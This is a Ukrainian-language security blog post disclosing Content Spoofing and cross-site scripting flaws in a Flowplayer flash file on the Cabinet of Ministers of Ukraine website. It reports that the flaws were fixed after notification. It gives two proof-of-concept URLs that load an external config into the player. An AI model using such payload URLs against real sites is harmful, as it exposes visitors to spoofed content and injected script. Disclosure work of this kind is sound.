Websecurity - Веб безпека

31.01.2015

У листопаді, 27.11.2012, я знайшов Content Spoofing та Cross-Site Scripting уразливості на http://www.kmu.gov.ua - сайті Кабінету Міністрів України. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на www.kmu.gov.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

01.05.2015

Content Spoofing:

http://www.kmu.gov.ua/swf/flowplayer-3.2.7.swf?config=http://site/1

Cross-Site Scripting:

http://www.kmu.gov.ua/swf/flowplayer-3.2.7.swf?config=http://site/xss

Дані уразливості вже виправлені шляхом оновлення флешки Flowplayer. Багато років вони використовували діряву флешку, після мого листа змінили її на безпечну версію, але не подякували мені за повідомлення про уразливості. Як це завжди робили адміни КМУ та багатьох інших державних сайтів на протязі 2006-2015 років.

This entry was posted on 23:50 01.05.2015 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.